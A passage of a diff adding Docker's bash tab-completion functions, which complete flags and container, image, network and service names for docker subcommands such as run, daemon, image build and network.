-W "--detach-keys --help --no-stdin --sig-proxy=false" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--detach-keys') + if [ $cword -eq $counter ]; then + __docker_complete_containers_running + fi + ;; + esac +} + +_docker_container_commit() { + case "$prev" in + --author|-a|--change|-c|--message|-m) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--author -a --change -c --help --message -m --pause=false -p=false" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--author|-a|--change|-c|--message|-m') + + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + return + fi + (( counter++ )) + + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + return + fi + ;; + esac +} + +_docker_container_cp() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--follow-link -L --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + case "$cur" in + *:) + return + ;; + *) + # combined container and filename completion + _filedir + local files=( ${COMPREPLY[@]} ) + + __docker_complete_containers_all + COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) + local containers=( ${COMPREPLY[@]} ) + + COMPREPLY=( $( compgen -W "${files[*]} ${containers[*]}" -- "$cur" ) ) + if [[ "$COMPREPLY" == *: ]]; then + __docker_nospace + fi + return + ;; + esac + fi + (( counter++ )) + + if [ $cword -eq $counter ]; then + if [ -e "$prev" ]; then + __docker_complete_containers_all + COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) + __docker_nospace + else + _filedir + fi + return + fi + ;; + esac +} + +_docker_container_create() { + _docker_container_run +} + +_docker_container_diff() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_exec() { + __docker_complete_detach-keys && return + + case "$prev" in + --env|-e) + # we do not append a "=" here because "-e VARNAME" is legal systax, too + COMPREPLY=( $( compgen -e -- "$cur" ) ) + __docker_nospace + return + ;; + --user|-u) + __docker_complete_user_group + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--detach -d --detach-keys --env -e --help --interactive -i --privileged -t --tty -u --user" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_running + ;; + esac +} + +_docker_container_export() { + case "$prev" in + --output|-o) + _filedir + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_inspect() { + _docker_inspect --type container +} + +_docker_container_kill() { + case "$prev" in + --signal|-s) + __docker_complete_signals + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --signal -s" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_running + ;; + esac +} + +_docker_container_logs() { + case "$prev" in + --since|--tail) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--details --follow -f --help --since --tail --timestamps -t" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--since|--tail') + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_list() { + _docker_container_ls +} + +_docker_container_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + ancestor) + cur="${cur##*=}" + __docker_complete_images + return + ;; + before) + __docker_complete_containers_all --cur "${cur##*=}" + return + ;; + id) + __docker_complete_containers_all --cur "${cur##*=}" --id + return + ;; + health) + COMPREPLY=( $( compgen -W "healthy starting none unhealthy" -- "${cur##*=}" ) ) + return + ;; + is-task) + COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) ) + return + ;; + name) + __docker_complete_containers_all --cur "${cur##*=}" --name + return + ;; + network) + __docker_complete_networks --cur "${cur##*=}" + return + ;; + since) + __docker_complete_containers_all --cur "${cur##*=}" + return + ;; + status) + COMPREPLY=( $( compgen -W "created dead exited paused restarting running removing" -- "${cur##*=}" ) ) + return + ;; + volume) + __docker_complete_volumes --cur "${cur##*=}" + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "ancestor before exited health id is-task label name network since status volume" -- "$cur" ) ) + __docker_nospace + return + ;; + --format|--last|-n) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --filter -f --format --help --last -n --latest -l --no-trunc --quiet -q --size -s" -- "$cur" ) ) + ;; + esac +} + +_docker_container_pause() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_running + ;; + esac +} + +_docker_container_port() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_container_ps() { + _docker_container_ls +} + +_docker_container_rename() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_container_restart() { + case "$prev" in + --time|-t) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_all + ;; + esac +} + +_docker_container_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help --link -l --volumes -v" -- "$cur" ) ) + ;; + *) + for arg in "${COMP_WORDS[@]}"; do + case "$arg" in + --force|-f) + __docker_complete_containers_all + return + ;; + esac + done + __docker_complete_containers_stopped + ;; + esac +} + +_docker_container_run() { + local options_with_args=" + --add-host + --attach -a + --blkio-weight + --blkio-weight-device + --cap-add + --cap-drop + --cgroup-parent + --cidfile + --cpu-period + --cpu-quota + --cpu-rt-period + --cpu-rt-runtime + --cpuset-cpus + --cpus + --cpuset-mems + --cpu-shares -c + --device + --device-read-bps + --device-read-iops + --device-write-bps + --device-write-iops + --dns + --dns-option + --dns-search + --entrypoint + --env -e + --env-file + --expose + --group-add + --hostname -h + --init-path + --ip + --ip6 + --ipc + --isolation + --kernel-memory + --label-file + --label -l + --link + --link-local-ip + --log-driver + --log-opt + --mac-address + --memory -m + --memory-swap + --memory-swappiness + --memory-reservation + --name + --network + --network-alias + --oom-score-adj + --pid + --pids-limit + --publish -p + --restart + --runtime + --security-opt + --shm-size + --stop-signal + --stop-timeout + --storage-opt + --tmpfs + --sysctl + --ulimit + --user -u + --userns + --uts + --volume-driver + --volumes-from + --volume -v + --workdir -w + " + + local boolean_options=" + --disable-content-trust=false + --help + --init + --interactive -i + --oom-kill-disable + --privileged + --publish-all -P + --read-only + --tty -t + " + + if [ "$command" = "run" -o "$subcommand" = "run" ] ; then + options_with_args="$options_with_args + --detach-keys + --health-cmd + --health-interval + --health-retries + --health-timeout + " + boolean_options="$boolean_options + --detach -d + --no-healthcheck + --rm + --sig-proxy=false + " + __docker_complete_detach-keys && return + fi + + local all_options="$options_with_args $boolean_options" + + + __docker_complete_log_driver_options && return + __docker_complete_restart && return + + local key=$(__docker_map_key_of_current_option '--security-opt') + case "$key" in + label) + [[ $cur == *: ]] && return + COMPREPLY=( $( compgen -W "user: role: type: level: disable" -- "${cur##*=}") ) + if [ "${COMPREPLY[*]}" != "disable" ] ; then + __docker_nospace + fi + return + ;; + seccomp) + local cur=${cur##*=} + _filedir + COMPREPLY+=( $( compgen -W "unconfined" -- "$cur" ) ) + return + ;; + esac + + case "$prev" in + --add-host) + case "$cur" in + *:) + __docker_complete_resolved_hostname + return + ;; + esac + ;; + --attach|-a) + COMPREPLY=( $( compgen -W 'stdin stdout stderr' -- "$cur" ) ) + return + ;; + --cap-add|--cap-drop) + __docker_complete_capabilities + return + ;; + --cidfile|--env-file|--init-path|--label-file) + _filedir + return + ;; + --device|--tmpfs|--volume|-v) + case "$cur" in + *:*) + # TODO somehow do _filedir for stuff inside the image, if it's already specified (which is also somewhat difficult to determine) + ;; + '') + COMPREPLY=( $( compgen -W '/' -- "$cur" ) ) + __docker_nospace + ;; + /*) + _filedir + __docker_nospace + ;; + esac + return + ;; + --env|-e) + # we do not append a "=" here because "-e VARNAME" is legal systax, too + COMPREPLY=( $( compgen -e -- "$cur" ) ) + __docker_nospace + return + ;; + --ipc) + case "$cur" in + *:*) + cur="${cur#*:}" + __docker_complete_containers_running + ;; + *) + COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) ) + if [ "$COMPREPLY" = "container:" ]; then + __docker_nospace + fi + ;; + esac + return + ;; + --isolation) + __docker_complete_isolation + return + ;; + --link) + case "$cur" in + *:*) + ;; + *) + __docker_complete_containers_running + COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) + __docker_nospace + ;; + esac + return + ;; + --log-driver) + __docker_complete_log_drivers + return + ;; + --log-opt) + __docker_complete_log_options + return + ;; + --network) + case "$cur" in + container:*) + __docker_complete_containers_all --cur "${cur#*:}" + ;; + *) + COMPREPLY=( $( compgen -W "$(__docker_plugins_bundled --type Network) $(__docker_networks) container:" -- "$cur") ) + if [ "${COMPREPLY[*]}" = "container:" ] ; then + __docker_nospace + fi + ;; + esac + return + ;; + --pid) + case "$cur" in + *:*) + __docker_complete_containers_running --cur "${cur#*:}" + ;; + *) + COMPREPLY=( $( compgen -W 'host container:' -- "$cur" ) ) + if [ "$COMPREPLY" = "container:" ]; then + __docker_nospace + fi + ;; + esac + return + ;; + --runtime) + __docker_complete_runtimes + return + ;; + --security-opt) + COMPREPLY=( $( compgen -W "apparmor= label= no-new-privileges seccomp=" -- "$cur") ) + if [ "${COMPREPLY[*]}" != "no-new-privileges" ] ; then + __docker_nospace + fi + return + ;; + --storage-opt) + COMPREPLY=( $( compgen -W "size" -S = -- "$cur") ) + __docker_nospace + return + ;; + --user|-u) + __docker_complete_user_group + return + ;; + --userns) + COMPREPLY=( $( compgen -W "host" -- "$cur" ) ) + return + ;; + --volume-driver) + __docker_complete_plugins_bundled --type Volume + return + ;; + --volumes-from) + __docker_complete_containers_all + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) + if [ $cword -eq $counter ]; then + __docker_complete_images + fi + ;; + esac +} + +_docker_container_start() { + __docker_complete_detach-keys && return + + case "$prev" in + --checkpoint) + if [ __docker_is_experimental ] ; then + return + fi + ;; + --checkpoint-dir) + if [ __docker_is_experimental ] ; then + _filedir -d + return + fi + ;; + esac + + case "$cur" in + -*) + local options="--attach -a --detach-keys --help --interactive -i" + __docker_is_experimental && options+=" --checkpoint --checkpoint-dir" + COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_stopped + ;; + esac +} + +_docker_container_stats() { + case "$prev" in + --format) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --format --help --no-stream" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_running + ;; + esac +} + +_docker_container_stop() { + case "$prev" in + --time|-t) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_running + ;; + esac +} + +_docker_container_top() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_running + fi + ;; + esac +} + +_docker_container_unpause() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_containers_unpauseable + fi + ;; + esac +} + +_docker_container_update() { + local options_with_args=" + --blkio-weight + --cpu-period + --cpu-quota + --cpu-rt-period + --cpu-rt-runtime + --cpuset-cpus + --cpuset-mems + --cpu-shares -c + --kernel-memory + --memory -m + --memory-reservation + --memory-swap + --restart + " + + local boolean_options=" + --help + " + + local all_options="$options_with_args $boolean_options" + + __docker_complete_restart && return + + case "$prev" in + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_all + ;; + esac +} + +_docker_container_wait() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_containers_all + ;; + esac +} + + +_docker_commit() { + _docker_container_commit +} + +_docker_cp() { + _docker_container_cp +} + +_docker_create() { + _docker_container_run +} + +_docker_daemon() { + local boolean_options=" + $global_boolean_options + --disable-legacy-registry + --experimental + --help + --icc=false + --init + --ip-forward=false + --ip-masq=false + --iptables=false + --ipv6 + --live-restore + --raw-logs + --selinux-enabled + --userland-proxy=false + " + local options_with_args=" + $global_options_with_args + --add-runtime + --api-cors-header + --authorization-plugin + --bip + --bridge -b + --cgroup-parent + --cluster-advertise + --cluster-store + --cluster-store-opt + --config-file + --containerd + --default-gateway + --default-gateway-v6 + --default-ulimit + --dns + --dns-search + --dns-opt + --exec-opt + --exec-root + --fixed-cidr + --fixed-cidr-v6 + --graph -g + --group -G + --init-path + --insecure-registry + --ip + --label + --log-driver + --log-opt + --max-concurrent-downloads + --max-concurrent-uploads + --mtu + --oom-score-adjust + --pidfile -p + --registry-mirror + --seccomp-profile + --shutdown-timeout + --storage-driver -s + --storage-opt + --userland-proxy-path + --userns-remap + " + + __docker_complete_log_driver_options && return + + key=$(__docker_map_key_of_current_option '--cluster-store-opt') + case "$key" in + kv.*file) + cur=${cur##*=} + _filedir + return + ;; + esac + + local key=$(__docker_map_key_of_current_option '--storage-opt') + case "$key" in + dm.blkdiscard|dm.override_udev_sync_check|dm.use_deferred_removal|dm.use_deferred_deletion) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + dm.fs) + COMPREPLY=( $( compgen -W "ext4 xfs" -- "${cur##*=}" ) ) + return + ;; + dm.thinpooldev) + cur=${cur##*=} + _filedir + return + ;; + esac + + case "$prev" in + --authorization-plugin) + __docker_complete_plugins_bundled --type Authorization + return + ;; + --cluster-store) + COMPREPLY=( $( compgen -W "consul etcd zk" -S "://" -- "$cur" ) ) + __docker_nospace + return + ;; + --cluster-store-opt) + COMPREPLY=( $( compgen -W "discovery.heartbeat discovery.ttl kv.cacertfile kv.certfile kv.keyfile kv.path" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + --config-file|--containerd|--init-path|--pidfile|-p|--tlscacert|--tlscert|--tlskey|--userland-proxy-path) + _filedir + return + ;; + --exec-root|--graph|-g) + _filedir -d + return + ;; + --log-driver) + __docker_complete_log_drivers + return + ;; + --storage-driver|-s) + COMPREPLY=( $( compgen -W "aufs btrfs devicemapper overlay overlay2 vfs zfs" -- "$(echo $cur | tr '[:upper:]' '[:lower:]')" ) ) + return + ;; + --storage-opt) + local btrfs_options="btrfs.min_space" + local devicemapper_options=" + dm.basesize + dm.blkdiscard + dm.blocksize + dm.fs + dm.loopdatasize + dm.loopmetadatasize + dm.min_free_space + dm.mkfsarg + dm.mountopt + dm.override_udev_sync_check + dm.thinpooldev + dm.use_deferred_deletion + dm.use_deferred_removal + " + local zfs_options="zfs.fsname" + + case $(__docker_value_of_option '--storage-driver|-s') in + '') + COMPREPLY=( $( compgen -W "$btrfs_options $devicemapper_options $zfs_options" -S = -- "$cur" ) ) + ;; + btrfs) + COMPREPLY=( $( compgen -W "$btrfs_options" -S = -- "$cur" ) ) + ;; + devicemapper) + COMPREPLY=( $( compgen -W "$devicemapper_options" -S = -- "$cur" ) ) + ;; + zfs) + COMPREPLY=( $( compgen -W "$zfs_options" -S = -- "$cur" ) ) + ;; + *) + return + ;; + esac + __docker_nospace + return + ;; + --log-level|-l) + __docker_complete_log_levels + return + ;; + --log-opt) + __docker_complete_log_options + return + ;; + --seccomp-profile) + _filedir json + return + ;; + --userns-remap) + __docker_complete_user_group + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) + ;; + esac +} + +_docker_deploy() { + __docker_is_experimental && _docker_stack_deploy +} + +_docker_diff() { + _docker_container_diff +} + +_docker_events() { + _docker_system_events +} + +_docker_exec() { + _docker_container_exec +} + +_docker_export() { + _docker_container_export +} + +_docker_help() { + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + COMPREPLY=( $( compgen -W "${commands[*]}" -- "$cur" ) ) + fi +} + +_docker_history() { + _docker_image_history +} + + +_docker_image() { + local subcommands=" + build + history + import + inspect + load + ls + prune + pull + push + rm + save + tag + " + local aliases=" + images + list + remove + rmi + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_image_build() { + local options_with_args=" + --build-arg + --cache-from + --cgroup-parent + --cpuset-cpus + --cpuset-mems + --cpu-shares -c + --cpu-period + --cpu-quota + --file -f + --isolation + --label + --memory -m + --memory-swap + --network + --shm-size + --tag -t + --ulimit + " + + local boolean_options=" + --compress + --disable-content-trust=false + --force-rm + --help + --no-cache + --pull + --quiet -q + --rm + " + __docker_is_experimental && boolean_options+="--squash" + + local all_options="$options_with_args $boolean_options" + + case "$prev" in + --build-arg) + COMPREPLY=( $( compgen -e -- "$cur" ) ) + __docker_nospace + return + ;; + --cache-from) + __docker_complete_image_repos_and_tags + return + ;; + --file|-f) + _filedir + return + ;; + --isolation) + __docker_complete_isolation + return + ;; + --network) + case "$cur" in + container:*) + __docker_complete_containers_all --cur "${cur#*:}" + ;; + *) + COMPREPLY=( $( compgen -W "$(__docker_plugins --type Network) $(__docker_networks) container:" -- "$cur") ) + if [ "${COMPREPLY[*]}" = "container:" ] ; then + __docker_nospace + fi + ;; + esac + return + ;; + --tag|-t) + __docker_complete_image_repos_and_tags + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) + if [ $cword -eq $counter ]; then + _filedir -d + fi + ;; + esac +} + +_docker_image_history() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --human=false -H=false --no-trunc --quiet -q" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_images + fi + ;; + esac +} + +_docker_image_images() { + _docker_image_ls +} + +_docker_image_import() { + case "$prev" in + --change|-c|--message|-m) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--change -c --help --message -m" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--change|-c|--message|-m') + if [ $cword -eq $counter ]; then + return + fi + (( counter++ )) + + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + return + fi + ;; + esac +} + +_docker_image_inspect() { + _docker_inspect --type image +} + +_docker_image_load() { + case "$prev" in + --input|-i) + _filedir + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --input -i --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_image_list() { + _docker_image_ls +} + +_docker_image_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + before|since|reference) + cur="${cur##*=}" + __docker_complete_images + return + ;; + dangling) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + label) + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "before dangling label reference since" -- "$cur" ) ) + __docker_nospace + return + ;; + --format) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --digests --filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) ) + ;; + =) + return + ;; + *) + __docker_complete_image_repos + ;; + esac +} + +_docker_image_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_image_pull() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all-tags -a --disable-content-trust=false --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + for arg in "${COMP_WORDS[@]}"; do + case "$arg" in + --all-tags|-a) + __docker_complete_image_repos + return + ;; + esac + done + __docker_complete_image_repos_and_tags + fi + ;; + esac +} + +_docker_image_push() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--disable-content-trust=false --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + fi + ;; + esac +} + +_docker_image_remove() { + _docker_image_rm +} + +_docker_image_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help --no-prune" -- "$cur" ) ) + ;; + *) + __docker_complete_images + ;; + esac +} + +_docker_image_rmi() { + _docker_image_rm +} + +_docker_image_save() { + case "$prev" in + --output|-o) + _filedir + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) ) + ;; + *) + __docker_complete_images + ;; + esac +} + +_docker_image_tag() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + return + fi + (( counter++ )) + + if [ $cword -eq $counter ]; then + __docker_complete_image_repos_and_tags + return + fi + ;; + esac +} + + +_docker_images() { + _docker_image_ls +} + +_docker_import() { + _docker_image_import +} + +_docker_info() { + _docker_system_info +} + +_docker_inspect() { + local preselected_type + local type + + if [ "$1" = "--type" ] ; then + preselected_type=yes + type="$2" + else + type=$(__docker_value_of_option --type) + fi + + case "$prev" in + --format|-f) + return + ;; + --type) + if [ -z "$preselected_type" ] ; then + COMPREPLY=( $( compgen -W "container image network node plugin service volume" -- "$cur" ) ) + return + fi + ;; + esac + + case "$cur" in + -*) + local options="--format -f --help --size -s" + if [ -z "$preselected_type" ] ; then + options+=" --type" + fi + COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) + ;; + *) + case "$type" in + '') + COMPREPLY=( $( compgen -W " + $(__docker_containers --all) + $(__docker_images) + $(__docker_networks) + $(__docker_nodes) + $(__docker_plugins_installed) + $(__docker_services) + $(__docker_volumes) + " -- "$cur" ) ) + ;; + container) + __docker_complete_containers_all + ;; + image) + __docker_complete_images + ;; + network) + __docker_complete_networks + ;; + node) + __docker_complete_nodes + ;; + plugin) + __docker_complete_plugins_installed + ;; + service) + __docker_complete_services + ;; + volume) + __docker_complete_volumes + ;; + esac + esac +} + +_docker_kill() { + _docker_container_kill +} + +_docker_load() { + _docker_image_load +} + +_docker_login() { + case "$prev" in + --password|-p|--username|-u) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --password -p --username -u" -- "$cur" ) ) + ;; + esac +} + +_docker_logout() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + esac +} + +_docker_logs() { + _docker_container_logs +} + +_docker_network_connect() { + local options_with_args=" + --alias + --ip + --ip6 + --link + --link-local-ip + " + + local boolean_options=" + --help + " + + case "$prev" in + --link) + case "$cur" in + *:*) + ;; + *) + __docker_complete_containers_running + COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) + __docker_nospace + ;; + esac + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) + if [ $cword -eq $counter ]; then + __docker_complete_networks + elif [ $cword -eq $(($counter + 1)) ]; then + __docker_complete_containers_all + fi + ;; + esac +} + +_docker_network_create() { + case "$prev" in + --aux-address|--gateway|--internal|--ip-range|--ipam-opt|--ipv6|--opt|-o|--subnet) + return + ;; + --ipam-driver) + COMPREPLY=( $( compgen -W "default" -- "$cur" ) ) + return + ;; + --driver|-d) + # remove drivers that allow one instance only, add drivers missing in `docker info` + __docker_complete_plugins_bundled --type Network --remove host --remove null --add macvlan + return + ;; + --label) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--attachable --aux-address --driver -d --gateway --help --internal --ip-range --ipam-driver --ipam-opt --ipv6 --label --opt -o --subnet" -- "$cur" ) ) + ;; + esac +} + +_docker_network_disconnect() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_networks + elif [ $cword -eq $(($counter + 1)) ]; then + __docker_complete_containers_in_network "$prev" + fi + ;; + esac +} + +_docker_network_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_networks + esac +} + +_docker_network_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + driver) + __docker_complete_plugins_bundled --cur "${cur##*=}" --type Network --add macvlan + return + ;; + id) + __docker_complete_networks --cur "${cur##*=}" --id + return + ;; + name) + __docker_complete_networks --cur "${cur##*=}" --name + return + ;; + type) + COMPREPLY=( $( compgen -W "builtin custom" -- "${cur##*=}" ) ) + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "driver id label name type" -- "$cur" ) ) + __docker_nospace + return + ;; + --format) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_network_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_network_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_networks --filter type=custom + esac +} + +_docker_network() { + local subcommands=" + connect + create + disconnect + inspect + ls + prune + rm + " + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_service() { + local subcommands=" + create + inspect + ls list + rm remove + scale + ps + update + " + __docker_daemon_is_experimental && subcommands+="logs" + + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_service_create() { + _docker_service_update +} + +_docker_service_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) ) + ;; + *) + __docker_complete_services + esac +} + +_docker_service_logs() { + case "$prev" in + --since|--tail) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--details --follow -f --help --no-resolve --since --tail --timestamps -t" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--since|--tail') + if [ $cword -eq $counter ]; then + __docker_complete_services + fi + ;; + esac +} + +_docker_service_list() { + _docker_service_ls +} + +_docker_service_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + id) + __docker_complete_services --cur "${cur##*=}" --id + return + ;; + name) + __docker_complete_services --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_service_remove() { + _docker_service_rm +} + +_docker_service_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_services + esac +} + +_docker_service_scale() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_services + __docker_append_to_completions "=" + __docker_nospace + ;; + esac +} + +_docker_service_ps() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + desired-state) + COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) + return + ;; + name) + __docker_complete_services --cur "${cur##*=}" --name + return + ;; + node) + __docker_complete_nodes_plus_self --cur "${cur##*=}" + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -W "desired-state id name node" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help 